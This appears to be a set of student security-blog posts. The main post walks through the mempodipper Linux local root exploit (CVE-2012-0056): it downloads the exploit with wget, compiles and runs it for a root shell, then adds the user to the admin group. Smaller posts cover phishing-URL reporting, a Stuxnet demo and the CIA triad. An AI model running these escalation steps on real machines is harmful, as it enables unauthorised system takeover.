This is a digital forensics report I did for digital forensics module it covers crime scene investigation and imaging of evidence.
It uses ACPO guidelines so all evidence is submissible to court.
This is a digital forensics report I did for digital forensics module it covers crime scene investigation and imaging of evidence.
It uses ACPO guidelines so all evidence is submissible to court.
This is a walk through to using the recent Linux Local Root for >=2.6.39, 32-bit and 64-bit by zx2c4
First you need to check what kernel the box is running.
# uname -r
In my case under backtrack 5 which is based on Ubuntu that users the kernel 2.6.39.4 which in vulnerable.
I then added a normal user that I would use for the demo
#useradd test
I then logged back in with test account
Then I checked what privileges the account had
#groups test
Which showed test was not a root enabled account
I then moved from to the Desktop
#cd /Desktop
I then made a folder to store the exploit source in.
#mkdir mempodipper
Then I moved to mempodipper directory
# cd /mempodipper
Then I downloaded the exploit source from github
#wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
Then compiled it
#gcc mempodipper.c -w -o mempodipper
Then ran it
#./memopdipper
It then gave all its output from the exploit, it was successful as it gave me a root shell
#whoami
returned root confirming that it worked.
I then added myself to the usergroup root
#sudo adduser test admin
Adding user `test’ to group `admin’ …
Adding user test to group admin
Done.
So from a test account you have got a full root account 😀
Then I verified that the user had really been added to the group root
#groups test
Source used to make this post and an in depth technical explanation of the exploit : http://blog.zx2c4.com/749
This is a Demo of CVE-2010-2568 from my talk on Stuxnet.
CVE-2010-2568 was the exploit Stuxnet used to spread itself.
Watch in HD
It is fairly easy to spot a fake email, others are written to play on peoples fear of authority or cancellation threats.
Quite allot of new spam emails are sent with and HTML page so that when the victim opens the page there is no suspicious URL as the file is local. The page then posts the page data to the attackers URL.
This also makes detecting and reporting the emails slightly harder as post URL is usually obfuscated.
The post URL can be easily found with FireFox addon TamperData
First open the spam message or webpage you wish to find the post page for .
The email I received is a Hotmail account phishing email.
Second make sure all other tabs are closed. Then start TamperData (Tools –> Tamper Data –> Start Tamper).Input some fake data and submit.
You can now see the exact place where the data is being posted.
Sometimes spammers have many different spam sites and one central place to collect the accounts so to make sure you should report the right URL so the phisher can be stopped.
Next step is to report the URL to Google. HERE
Next report to Microsoft. This has to be done from within IE 8/7. Visit the URL.
Then Settings –> Safety –> Report Unsafe Website
Then do a who.is lookup to see who is hosting the domain so that they can be informed of the abuse.
In the example the domain is iserver.net. This is hosted by an Australian company. I then reported the phishing url page thelaun9.iserver.net/mys/index.php & where all the stolen data is to prove it is being used for phishing thelaun9.iserver.net/mys/conf.php.
If more people report phishing emails it will help make the web a safer place.
Update : Site is now blocked in Firefox / Chrome after I reported it.
The CIA triangle stands for confidentiality, integrity and availability. They represents the aims of Information Security.
Confidentiality is preventing unauthorized access to data.
Integrity is preventing the unauthorized modification of data.
Availability is preventing the unauthorized nonavailability of data.